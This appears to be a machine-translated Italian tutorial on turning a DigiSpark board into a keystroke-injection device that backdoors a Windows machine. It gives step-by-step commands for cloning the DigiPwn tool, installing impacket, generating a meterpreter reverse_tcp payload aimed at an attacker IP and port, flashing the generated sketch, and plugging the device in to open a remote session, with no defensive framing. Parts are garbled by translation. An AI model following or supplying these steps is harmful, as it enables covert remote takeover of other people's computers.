Sommario:
2025 Autore: John Day | [email protected]. Ultima modifica: 2025-01-13 06:57
Allora cosa ci facciamo qui?
DigiSpark è un piccolo strumento di sviluppo basato su Arduino che può fungere da input da tastiera HID. Oggi manipoliamo questo dispositivo per eseguire il backdoor di un sistema operativo Windows!
Forniture
Arduino IDE
Una macchina Windows
DigiSpark
Metasploit Framework
Python 2.7 (Nota: hai bisogno di Python "2.7" non andare per nessun'altra versione)
impattare
Cervello! Aiuta
Passaggio 1: clona il repository DigiPwn
Clona nel repository GitHub di DigiPwn di
git clone
Ora cambia directory in DigiPwn di
cd DigiPwn/
Passaggio 2: installa Impacket [Moduli richiesti da Python]
Questo modulo è necessario per eseguire il server SMB richiesto per la libreria payload
sudo apt-get install python-impacket
Oppure puoi scaricare la libreria impacket e installarla da qui.
Passaggio 3: generiamo il carico utile
Correre
python DigiPwn.py [HOST] [PORTA] [PAYLOAD] [FILE DI USCITA] [formato]
ex
python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs
Ora ti verrà chiesto se avviare lo stager e il server SMB. Premi y e premi invio
Passaggio 4: ora carica il codice su Arduino
Prima di caricare, dobbiamo assicurarci che la scheda DigiSpark sia installata in Arduino per farlo guardare qui.
dopodiché carica il file keystroke_inject.ino generato dallo script. Una volta fatto sei pronto per
Passaggio 5: è ora di collegare il bambino
Collega subito il tuo DigiSpark e attendi 10 secondi
BOOM C'è una sessione di meterpreter aperta!